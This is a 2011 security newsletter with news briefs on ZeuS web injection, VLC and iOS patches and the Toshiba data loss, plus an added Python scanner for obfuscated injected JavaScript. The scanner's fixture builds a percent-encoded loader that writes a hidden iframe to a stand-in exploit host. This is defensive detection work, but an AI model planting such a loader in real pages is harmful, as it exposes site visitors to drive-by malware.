Internet Security Alliance Daily Brief (7/19/2011)

Internet Security Alliance Daily Brief
** Your source for current and relevant cyber security issues **

For Your Immediate Attention

The DoD Cyber Strategy - “Department of Defense Strategy for Operating in Cyberspace” outlines 5 strategic initiatives.  They are to treat cyberspace as an operational domain to organize, train, and equip so that DoD can take full advantage of cyberspace’s potential; employ new defense operating concepts to protect DoD networks and systems; partner with other U.S. government departments and agencies and the private sector to enable a whole-of-government cybersecurity strategy; build robust relationships with U.S. allies and international partners to strengthen collective cybersecurity; and leverage the nation’s ingenuity through an exceptional cyber workforce and rapid technological innovation.
Click here to read the strategy: http://www.defense.gov/news/d20110714cyber.pdf

In Today's News 

VLC MEDIA PLAYER 1.1.11 CLOSES HEAP OVERFLOW HOLES - H SECURITY, JULY 18

The VideoLAN project announced the release of version 1.1.11 of VLC Media Player. The twelfth release of the 1.1.x branch of VLC is a maintenance and security update that fixes two previously reported heap overflow vulnerabilities in the Real Media and AVI file parsers. Other changes include improvements to the VLC interface on Mac OS X systems and fullscreen fixes for the Win32 Web plug-in, as well as several codec and translation updates. Extensions support and the AVI mixer for converting and transcoding also received fixes. Source: http://www.h-online.com/security/news/item/VLC-Media-Player-1-1-11-closes-heap-overflow-holes-1280716.html

TOSHIBA CONFIRMS LOSS OF CUSTOMER DATA FOLLOWING WEBSITE HACK - SOFTPEDIA, JULY 18

Toshiba confirmed one of its U.S. Web sites was compromised the week of July 11, which led to the loss of user account information. A spokesperson for the consumer electronics company told the Wall Street Journal its U.S. unit observed issues with its Web server July 11 and began investigating. The company confirmed the server was compromised July 13, and user data was stolen. This coincided with a hacker leaking data extracted from the Web site on pastebin. According to Toshiba, the hacked site housed personal information of more than 7,500 customers, but only data belonging to 681 of them was compromised. This is somewhat consistent with what the hacker claimed. He said one database table called "Tbl_Gb_Users" had 5,203 entries, and he eventually leaked about 800 of them. The Toshiba spokesperson stressed no financial data or credit card details were exposed as a result of the breach. Source: http://news.softpedia.com/news/Toshiba-Confirms-Loss-of-User-DataFollowing-Website-Hack-212115.shtml

INTEL INVESTIGATING POSSIBLE BUG IN SSD 320 DRIVES - IDG NEWS SERVICE, JULY 15

Intel said it is investigating a potential bug that may be causing SSD 320 solid-state drives to fail. In Intel's support forums, users complained that SSD 320 drives were crashing after power problems and losing data; in some instances the drive's capacity was reported as only 8MB after the crash. An Intel technical support representative said that until the issue is resolved, affected customers will be sent a replacement drive. The SSD 320 was released in March and is used in PCs and Apple Mac computers. Source: http://www.computerworld.com/s/article/9218463/Intel_investigating_possible_bug_in_SSD_320_drives

NEW MASS INJECTION ATTACK DISTRIBUTES ZEUS - SOFTPEDIA, JULY 15

Security researchers from Sophos warn of a widespread Web injection attack that has infected a large number of Web sites with code distributing a variant of the ZeuS trojan. "Huge numbers of sites have been injected with a malicious JavaScript that attempts to load content from an exploit site when innocent users browse the affected pages," a principal virus researcher at Sophos said. The injected code, detected by Sophos as Mal/ObfJS-AB, currently accounts for a quarter of all threats reported to the company. The attack does not appear to be limited to any particular type of Web site or Web server, which suggests the compromise vector is stolen FTP credentials rather than a flaw in one platform; the payload makes that theory more likely still, since ZeuS is an information-stealing trojan that harvests credentials, FTP logins among them, from the machines it infects. The injected script redirects visitors to a third-party page that launches PDF and Java exploits, and a successful exploit installs the ZeuS variant. "Perhaps the most interesting thing about this attack is the exploit site JavaScript (the content we block as Mal/ExpJS-N). We have been seeing the same exploit script at the end of spam links and JS/Sinowal-V redirects in recent weeks," the Sophos researcher said. "The script is heavily obfuscated and uses polymorphic and anti-emulation techniques to attempt to evade detection." He said the affected Web sites span different hosting providers, so no hosting company appears to be singled out, as has been seen in some other mass injection attacks. Source: http://news.softpedia.com/news/New-Mass-Injection-Attack-Distributes-ZeuS-211843.shtml
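A heuristic scanner for the kind of injection described above, added here as an example and not part of the Sophos report or the original brief: it walks HTML pages, flags inline scripts that combine obfuscation indicators (eval/unescape calls, long hex or percent escape runs, very long lines), decodes the escaped runs and reports any host they reference that is not on an assumed allowlist. The TRUSTED_HOSTS allowlist, the two sample pages and the exploit.invalid domain are constructed for the example; the indicators are generic and are not Sophos' Mal/ObfJS-AB signature.

```python
"""Heuristic scan for injected, obfuscated JavaScript in HTML pages.

Added example accompanying the mass-injection story; it is not Sophos'
detection logic for Mal/ObfJS-AB. The allowlist, the sample pages and the
exploit.invalid domain are constructed for illustration.
"""
import os
import re
from urllib.parse import unquote

# Assumption: hosts this site legitimately loads scripts and frames from.
TRUSTED_HOSTS = {"www.example.com", "cdn.example.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
URL_RE = re.compile(r"(?:https?:)?//((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)
EVAL_RE = re.compile(
    r"\b(?:eval|unescape)\s*\(|String\.fromCharCode|document\.write\s*\(", re.I)
ESCAPE_RUN_RE = re.compile(r"(?:%[0-9a-f]{2}){8,}|(?:\\x[0-9a-f]{2}){8,}", re.I)
LONG_LINE = 400  # chars; injected one-line loaders are typically far longer


def foreign_hosts(text):
    """Hosts referenced by URL in text that are not on the allowlist."""
    return sorted({h.lower() for h in URL_RE.findall(text)
                   if h.lower() not in TRUSTED_HOSTS})


def decode_escapes(code):
    """Decode %xx and \\xNN runs so URLs hidden inside them become visible."""
    out = []
    for run in ESCAPE_RUN_RE.findall(code):
        if run.startswith("%"):
            out.append(unquote(run))
        else:
            out.append(bytes(run, "ascii").decode("unicode_escape"))
    return "\n".join(out)


def scan_page(html):
    """Return a list of (finding, detail) tuples for one HTML document."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:  # external script: only the host matters
            for host in foreign_hosts(src.group(1)):
                findings.append(("external_script", host))
            continue
        indicators = []
        if EVAL_RE.search(body):
            indicators.append("eval_like")
        if ESCAPE_RUN_RE.search(body):
            indicators.append("escape_runs")
        if max((len(line) for line in body.splitlines()), default=0) > LONG_LINE:
            indicators.append("long_line")
        # One indicator alone is common in legitimate minified code; two or
        # more together is the shape of an injected loader.
        if len(indicators) >= 2:
            findings.append(("obfuscated_inline_script", ",".join(indicators)))
        for host in foreign_hosts(decode_escapes(body)):
            findings.append(("decoded_foreign_url", host))
    for tag in IFRAME_RE.findall(html):  # hidden frames injected in the clear
        for host in foreign_hosts(tag):
            findings.append(("external_iframe", host))
    return findings


def scan_directory(root):
    """Walk a web root and return {path: findings} for files that hit."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm", ".php")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_page(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed samples (not real captured pages). The injected loader is a
# percent-encoded document.write() that drops a 1x1 iframe to the exploit host.
INNER = ("document.write('<iframe src=\"http://exploit.invalid/in.php\" "
         "width=\"1\" height=\"1\"></iframe>');")
ENCODED = "".join("%%%02x" % b for b in INNER.encode())
INJECTED_PAGE = (
    "<html><head><title>Shop</title>"
    "<script src=\"https://cdn.example.com/app.js\"></script>"
    "</head><body><h1>Welcome</h1>"
    "<script>eval(unescape('" + ENCODED + "'))</script></body></html>")
CLEAN_PAGE = (
    "<html><head><title>Shop</title>"
    "<script src=\"https://cdn.example.com/app.js\"></script>"
    "<script>\nfunction track(e) {\n  console.log('click', e.target.id);\n}\n"
    "</script></head><body><h1>Welcome</h1></body></html>")

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(label, scan_page(page))
```

Run it as a script to see the findings for the two constructed pages, or call scan_directory() on a web root. Because the injected script is polymorphic, matching on the structure of the loader (an obfuscated inline script that resolves to a host the site never uses) holds up better than matching a literal snippet; where a clean copy of the site exists in version control, a diff against it is the more reliable check, and the FTP logs are where to look for the account that was used.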

APPLE RELEASES iOS UPDATES TO FIX PDF VULNERABILITIES - MACWORLD, JULY 15

After a report from the German government the week of July 11 regarding PDF-related security vulnerabilities in MobileSafari, Apple released updates July 15 for all iOS devices that fix the problem. The patch comes in two versions because of the two iPhone 4 models, though both fix the same three vulnerabilities: iOS 4.3.4 applies to the iPad and iPad 2, the third- and fourth-generation iPod touch, the iPhone 3GS, and the GSM iPhone 4; the CDMA iPhone 4 instead receives iOS 4.2.9. The updates address a flaw in FreeType's handling of TrueType and Type 1 fonts embedded in PDFs, reachable through Apple's CoreGraphics framework, which a crafted PDF can use to execute arbitrary code, and an invalid type conversion in the IOMobileFrameBuffer component that could let code already running as the user gain system privileges. The same PDF exploit was used by the latest jailbreak method for iOS devices, delivered through the jailbreakme.com Web site; Apple's patch reportedly disables that method. Source: http://www.computerworld.com/s/article/9218449/Apple_releases_iOS_updates_to_fix_PDF_vulnerabilities

Upcoming Events     

July 19 at 3:00pm: Protected Health Information Project Finale Subcommittee
The finale subcommittee will facilitate overall integration of the subcommittee input with a view toward producing a coherent final report, and it is led by Rick Kam of ID Experts and Ed Stull of Direct Computer Resources, Inc.

July 19: Securing the eCampus 2011 Conference
Larry Clinton will present, "The Evolution of Cyber Threats and Government Policy" during this conference held at Dartmouth College.

July 20: Government Innovation Seminar - Engaging the Evolving National Cyber Security Agenda
Larry Clinton will discuss the economics of cyber security and provide a framework for developing a sustainable system of cyber security by identifying the problems that need to be addressed.

July 20 at 2:00pm: Protected Health Information Project Ecosystem Subcommittee
The ecosystem subcommittee will define points of compromise in the healthcare ecosystem where there are risks of exposure, and is co-chaired by James Christiansen of Evantix, Gary Gordon of the Center for Identity at the University of Texas at Austin, and Lynda Martel of DriveSavers Data Recovery, Inc.

July 20 at 4:00pm: Protected Health Information Project Legal Subcommittee
The legal subcommittee will identify existing legal protections related to PHI, and is co-chaired by Christine Arevalo of ID Experts, Chris Cwalina and Steve Roosa of Reed Smith, LLP, and  Jim Pyles from Powers Pyles Sutter & Verville, PC.

July 21 at 1:30pm: Protected Health Information Project Survey Subcommittee
The survey subcommittee will query chief security / privacy officers and consumers on what they consider to be sensitive data, and is being led by Christine El Eris and Michael Morelli of Affinion Group, Larry Ponemon of the Ponemon Institute, Don Rebovich of the Center for Identity Management and Information Protection at Utica College, and Andrew Serwin from Foley & Lardner LLP.

July 22: NSTIC NOI Comments Due to NIST
A Notice of Inquiry (NOI) has been issued on the latest draft of the National Strategy for Trusted Identities in Cyberspace (NSTIC). The NOI addresses models for a governance structure for NSTIC. The comments received will inform NIST's deliberations and decisions on the steering body. NIST will then produce a public report with recommendations for addressing the questions raised on the four key issues outlined in the strategy.
For more information about this project contact Stephanie Schaffer at sschaffer@isalliance.org.

July 26 from 8:00am-5:00pm: 2011 IT Sector Coordinating Council IT Summer Quarterly meeting

August 2 at 2:00pm: ISA Summer Board Conference Call

September 26 & 27: ACI Cyber and Data Risk Insurance
Larry Clinton will discuss the latest federal regulatory developments and enforcement actions and their impact on insurance coverage and litigation.

Thought Leadership
US House Homeland Security Committee Hearing
ISA President Larry Clinton has been asked to testify before the Homeland Security Subcommittee on Cybersecurity, Infrastructure Protection and Security Technologies. The hearing is entitled "Examining the Homeland Security Impact of the Obama Administration's Cybersecurity Proposal."
The webcast can be viewed live through the following link: http://homeland.house.gov/hearing/subcommittee-hearing-examining-homeland-security-impact-obamaadministrations-cybersecurity

Summer 2011, Journal of Strategic Security
"A Relationship on the Rocks: Industry-Government Partnership for Cyber Defense," authored by Larry Clinton, was published in a recent issue; the PDF is linked next to the article's title on the journal's site.

May 2011, Cutter IT Journal
ISA President Larry Clinton authored the article "A Theory to Guide US Cyber Security Policy," which appears on page 30 of the downloadable issue.

Spring 2012 - Conflict and Cooperation in the Commons
Larry Clinton has authored the chapter "Cyber Security Social Contract".  This book is forthcoming from Georgetown University Press. 

For more security news visit Infosec Island, an ISA partner organization. Infosec Island is a leading information security portal committed to serving the risk mitigation needs of SMBs, mid-market enterprises, government agencies, legal, financial, healthcare, educational, and nonprofit organizations by providing the latest in news, free network security tools, and insights from leading industry experts.

Pass the ISA Daily Brief along to your colleagues.  They can create their own subscriptions by contacting mmorgan@isalliance.org